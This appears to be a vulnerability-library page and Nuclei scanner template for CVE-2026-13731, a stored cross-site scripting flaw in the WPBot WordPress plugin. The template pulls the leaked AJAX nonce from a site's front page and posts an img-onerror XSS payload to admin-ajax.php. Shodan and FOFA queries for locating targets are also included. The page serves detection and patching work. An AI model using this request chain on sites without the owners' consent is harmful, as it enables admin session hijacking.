/Vulnerability Library

WPBot <= 8.4.9 - Cross-Site Scripting

CVE-2026-13731
Early Release

Description

WPBot <= 8.4.9 is vulnerable to stored cross-site scripting via the conversation parameter in the qcld_wb_chatbot_conversation_save AJAX action. The AJAX nonce (qcsecretbotnonceval123qc) is publicly emitted on every frontend page via wp_localize_script under the ajax_nonce key, making it freely obtainable by unauthenticated visitors. The conversation parameter is saved to the database without sanitization and rendered unsanitized in the admin chat session view, causing stored XSS that executes when an administrator views saved chat sessions.

Severity

High

CVSS Score

7.2

Exploit Probability

0%

Affected Product

chatbot

Published Date

July 3, 2026

Template Author

0x_akoko

CVE-2026-13731.yaml
id: CVE-2026-13731

info:
  name: WPBot <= 8.4.9 - Cross-Site Scripting
  author: 0x_Akoko
  severity: high
  description: |
    WPBot <= 8.4.9 is vulnerable to stored cross-site scripting via the conversation parameter in the qcld_wb_chatbot_conversation_save AJAX action. The AJAX nonce (qcsecretbotnonceval123qc) is publicly emitted on every frontend page via wp_localize_script under the ajax_nonce key, making it freely obtainable by unauthenticated visitors. The conversation parameter is saved to the database without sanitization and rendered unsanitized in the admin chat session view, causing stored XSS that executes when an administrator views saved chat sessions.
  impact: |
    Unauthenticated attackers can inject arbitrary JavaScript into the admin chat sessions view, enabling session hijacking, admin credential theft, or further site compromise.
  remediation: |
    Update WPBot to version 8.5.0 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/124f2b72-d8da-46ba-844f-e9cc01441702
    - https://plugins.trac.wordpress.org/browser/chatbot/tags/8.4.9/includes/chat-sessions/wpbot-chat-sessions.php#L509
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2026-13731
    epss-score: 0.00241
    epss-percentile: 0.151
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 3
    vendor: quantumcloud
    product: chatbot
    fofa-query: body="wp_chatbot_obj"
    shodan-query: http.html:"wp_chatbot_obj"
    tags: cve,cve2026,wordpress,wp-plugin,wpbot,chatbot,xss,stored,unauth,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-content/plugins/chatbot/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WPBot")'
          - 'compare_versions(lsversion, ">=1.0.0", "<=8.4.9")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lsversion
        internal: true
        regex:
          - 'Stable tag: ([\d.]+)'
        group: 1

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "ajax_nonce")'
          - 'contains(body, "wp_chatbot_obj")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: ajax_nonce
        internal: true
        regex:
          - '"ajax_nonce"\s*:\s*"([^"]+)"'
        group: 1

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=qcld_wb_chatbot_conversation_save&session_id={{randstr}}&name=test&email=test%40test.com&phone=1234&conversation=%3Cli+class%3D%22wp-chat-user-msg%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%3C%2Fli%3E&security={{ajax_nonce}}&user_id=0

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
# digest: 4a0a0047304502201b3ebc7d5ca77b063ae1750e5d989f91f071fa8d4048f69848ffc814c53f8bb9022100ef42deaf19bedb3ad99e878df9e7a1d38554b087a148b93d9e09c97638b8e65b:922c64590222798bb761d5b6d8e72950
7.2Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-13731
CWE ID:
cwe-79

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/124f2b72-d8da-46ba-844f-e9cc01441702https://plugins.trac.wordpress.org/browser/chatbot/tags/8.4.9/includes/chat-sessions/wpbot-chat-sessions.php#L509

Remediation Steps

Update WPBot to version 8.5.0 or later.